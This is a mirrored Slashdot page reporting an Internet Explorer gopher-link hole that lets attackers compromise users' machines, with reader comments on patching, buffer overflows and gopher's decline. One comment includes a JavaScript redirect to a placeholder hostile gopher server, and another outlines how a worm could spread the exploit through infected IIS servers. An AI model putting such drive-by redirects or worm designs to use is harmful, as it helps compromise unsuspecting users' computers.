Slashdot Mirror

← Back to Stories (view on slashdot.org)

Latest IE Hole Lets Gopher Root You

Posted by ryuzaki0 on from the well-isn't-that-special dept.

rvaniwaa writes "Another hole in internet explorer has been discovered. This hole allows a hacker to root a user's computer whenever the user clicks on a gopher link. All versions of IE are affected and a Microsoft spokesman stated that the company is "moving forward on the investigation with all due speed""

23 of 533 comments (clear)

  1. My thoughts: by FortKnox · · Score: 2, Insightful

    Written in one of my journal entries.

    See if this story follows pattern (I think it will).

    --
    Good quote, too many chars. Seriously, the slashdot 120 char limit sucks!
    1. Re:My thoughts: by sphealey · · Score: 5, Insightful
      The existence of the exploit in the first place is troubling, but the *really serious* problem is #3, where almost nobody installs the patch until it is too late. Basically, Microsoft may not care as much about security as the security experts do, but the sad truth is that many users and even sysadmins care even less.
      Well, yes. OTOH, you missed Step 3a, where the Microsoft patch breaks numerous mission-critical non-Microsoft applications. Office 97 SP2 was a classic here: Novell Netware clients never worked the same after that one was installed. Necessary for security I am sure. And NT SP6, which broke Lotus Notes.

      You also missed step 2.9, where the hapless sysadmin spends 3 days trying to figure out Microsoft's patch dependency tree, which is not published. And even M$ admits that they use different, and incompatible, patch mechanisms for different product lines. So if I pull out the install disk to add an additional function to Visio, do I have to reinstall Office XP patches? Why or why not?

      sPh

  2. Re:All three gopher links left.. by linderdm · · Score: 5, Insightful

    I agree that there may not be many gopher links that look like gopher links, but what stops the malicious from disquising their gopher links to look like regular hrefs?

  3. Re:...and yet by Fantanicity · · Score: 2, Insightful

    When are the writers of other browsers going to release the documentation proving that the gopher handling code has been security auditted, that sufficient gopher testcases have been built, and that the browser passed all the gopher handling tests?

    The reason there are aren't reports of security holes in gopher code in other browers is that no-one has looked, not that the holes don't exist.

  4. Or... by Robber+Baron · · Score: 2, Insightful

    Don't use IE!

    --

    You're using her as bait, Master!

    1. Re:Or... by Jucius+Maximus · · Score: 3, Insightful
      "Don't use IE!"

      I wish it was that simple. There are hordes of people out there who have jobs where if they install anything on their work computer they will get in trouble.

      I am one of these people. I have no choice but to use MSIE and Outlook on NT at work.

      I feel so dirty.

      And thus the previous comments about blocking gopher are important to many.

  5. **Sigh...** by TweeKinDaBahx · · Score: 2, Insightful

    Most of the other browsers have security holes found in them from time to time as well, but most of the kind crackers out there seems to take a diabolical pleasure in focusing on IE (and since it's one of the core technologies of it, Windows...). If people spent as much time trying to break many of the other Browsers out there, I'm sure they would find they're all their own brand of swiss cheese.

    No software is rock solid, even when it's written to be. There's always a european teenager with way too much time on their hands just waiting to turn you Titanium fortress into a window screen...

    --
    Linux is dead.
    LU
    1. Re:**Sigh...** by Jeremi · · Score: 3, Insightful
      No software is rock solid, even when it's written to be


      Perhaps so, but avoiding buffer overflows isn't rocket science. It's a simple matter of bounds checking. There's really no excuse.

      --


      I don't care if it's 90,000 hectares. That lake was not my doing.
  6. Re:And how's that working for ya? by liquidsin · · Score: 4, Insightful

    Hey, cut them some slack. It only took five months to find a hole in a protocol that nobody's used in...what...seven, eight years? We should have all the IE/Outlook bugs patched up sometime around 2026.

    --
    do not read this line twice.
  7. Not necessarily... by Andy+Dodd · · Score: 1, Insightful

    The gopher URL is most likely bogus to begin with. Processing the URL is what roots you, not connecting to the actual Gopher site. i.e. you need a proxy that filters out all Gopher links from the HTML to keep them from ever reaching your browser (Just like the only way to protect Outlook from some classes of worms is server-side filtering)

    --
    retrorocket.o not found, launch anyway?
  8. Re:All three gopher links left.. by kesuki · · Score: 5, Insightful

    nothing... a simple redirect page can force the gopher link to be opened without the user even being asked to click anything. Not to mention javascript. Anything that allows all those pop-up and pop-under ads can just as easily open a gopher link.

    --
    https://www.gnu.org/philosophy/free-sw.html
  9. Re:Too damn obvious by Jucius+Maximus · · Score: 5, Insightful
    Just one question:

    Why the h3ll is anyone motivated to find bugs in IE's gopher protocols?!? It must have been a real slow day at Oy Online Solutions for them to find this.

  10. Re:All three gopher links left.. by Anonymous Coward · · Score: 1, Insightful

    It is a very light protocol, there was some talk of using it for phones instead of the awful WAP junk

  11. What the hell is this about? by drew_kime · · Score: 5, Insightful
    A Microsoft spokesman who refused to be identified said Tuesday ...

    And just why should we trust anything this guy says? Their official spokesman won't even stand by what he's saying. And what is he saying, anyway?

    Refusing to confirm the security flaw, the Microsoft spokesman said the company "feel(s) strongly that speculating on the issue while the investigation is in progress would be irresponsible and counterproductive to our goal of protecting our customers' information."

    And the spokesman added, "Responsible security researchers work with the vendor of a suspected vulnerability issue to ensure that countermeasures are developed before the issue is made public and customers are needlessly put at risk."

    So again, as far as Microsoft is concerned, it's the fault of the people who publicized it. It's prudent to assume these guys are not the only ones who know about the problem. Which means my information is already at risk.

    So if there are people out there who can compromise my system, why shouldn't I be able to find out about it and take preventive measures? Why should I have to wait until Microsoft -- who haven't even admitted to the vulnerability yet, two weeks after being told about it -- get around to fixing it?

    --
    Nope, no sig
  12. I.E. helps terrorists by NinjaWorm · · Score: 2, Insightful

    LOL this story after reading that crap about Open Source helping terror.

    Who needs a patch? just download OPRA and bam fixed.

  13. Re:The remedy by indiigo · · Score: 1, Insightful

    better yet just block port 70 on the firewall. Noone uses it anymore. This is one protocol that is deader than a doornail, and the solution takes a firewall admin probably less than a minute.

    --
    fslg503-985-8686503-985-8686503-985-8686503-985-86 8650 3-985-fdsg8686503-985-8686503-985-8686503-9
  14. Buffer overflow, buffer overflow, buffer overflow by dpbsmith · · Score: 3, Insightful

    ...why do they have to find and fix them one by one? Can't they switch to a programming language, or debugging tool, or run-time library, that would find and fix all of them?

    Indeed, about the time Windows 2000 was released with 65536 known bugs (or whatever the exact number was), didn't Jim Allchin say that they had such a tool and were using it?

    Should buffer overflows be as outdated as Gopher itself?

    --

    "How to Do Nothing," kids activities, back in print!

  15. Re:Wow... by Gerv · · Score: 5, Insightful

    most imporatant of these that gopher is absolutly archaic.

    <script>
    document.location.replace("gopher://ev il.gopherser ver.com:7000/buffer_overflow/");
    </script>

    Second, as always, Microsoft will have a patch out fairly quickly, which is more that can be said for mozilla half of the time...

    I'm amazed at how you split one security hole (XMLHTTPRequest) in two to make a "half the time"... :-)

    Incidentally, the patch for XMLHTTPRequest was in nightly builds within 48 hours of the bug report, and in the next milestone within about a week. In contrast, there are currently 17 unpatched holes in IE. What was that you were saying about "quickly"?

    Gerv

  16. Even tho gopher is dead, this is a problem by joshv · · Score: 5, Insightful

    Everyone keeps saying "but there are like three gopher servers left out there". This is not the point. Any buffer overflow in the IE client code which is exploitable is a huge problem. It doesn't matter that there are damned few servers left that use the exploitable protocol. A malacious server need not even be a fully functioning gopher server, it just needs to listen for requests on the right port and respond appropriately. A worm'ed IIS server could fit the bill quite nicely.

    A smart worm could:
    1. Infect an IIS server via some unfixed hole, or backdoor left by another worm.
    2. Open up a dummy gopher port which responds to all requests with the exploit.
    3. Replace links on the web site the IIS server serves with links to the gopher server exploit.
    4. The worm installs itself on all client machines that click the gopher links and begins scanning for vunerable servers.
    5. Goto 1.

    None of this has anything to do with the number gopher servers left on the Internet.

    -josh

  17. For all of you slamming MS by kraf · · Score: 3, Insightful

    They don't care.

    Yeah, they made some PR stunts concerning security, but until stuff like this starts affecting their bottom line, they won't care.
    There are just too many morons out there buying their stuff, so the situation won't change anytime soon.

    And don't give me that crap about being forced into using it. Noone is going to hold a gun against your head and say: use explorer or die.
    If your employer makes you use stuff you hate, then you're just a lame pushover and you deserve what you get.

  18. Re:All three gopher links left.. by phayes · · Score: 2, Insightful
    Gopher was a protocol devised to replace FTP. Anyone who has ever taken a look at the protocol FTP uses or set up a firewall knows how crufty FTP is (FTP needs 2 ports, a get implies a connection from the server tu the client, etc).

    Gopher had the advantage of a clean protocol & easy to use clients.

    FTP had the advantage of being widely deployed.

    Had not prettified clients like web browsers come along at the time they did, ftp was doomed, but once the clients were easy enough to use there wasn't enough incentive to replace crufty old FTP.

    --
    Democracy is a sheep and two wolves deciding what to have for lunch. Freedom is a well armed sheep contesting the issue
  19. Re:What's worse? by stinky+wizzleteats · · Score: 3, Insightful

    Ah, the ubiquitous inevitibility argument.

    That argument is, of course, bullshit. Use of a modern HTML DTD such as 4.01 strict enforces consistent behavior on the client side. Javascript may still be a problem, but handicapped accessiblity guidelines will require that content be delivered without its use.

    There was a time where I could not browse the web with anything but IE because of the MS incited erosion of HTML standards. But the resurgence of attention to those standards, combined with a significant and growing user population using non IE browsers, have forced most web sites to un-adapt from the defacto Microsoft standard.

    As for Opera specifically, it is the only browser out there which consistently obeys pre- HTML 4.01 strict DTDs. I am a paying user of Opera, and use it on all my GUI systems.

  20. Re:Too damn obvious by btellier · · Score: 4, Insightful

    You're looking at security research backwards. When I do security audits, particularly closed-source ones, I look at the more "obscure" features first. The benefits to this are numerous:

    - The program's maintainers are less likely to check these portions of code for errors because users don't complain about them as much.

    - The legacy protocols probably contain code from the pre-security awareness days. They're more likely to contain such "new" security concerns as Format String bugs and signed/unsigned conversions.

    - Other people doing audits on the same software have probably been over all the basics many times using automated tools and buffer overflow spamming.

    I know the above post was probably meant as a joke, but the guys above are probably more clever than you think.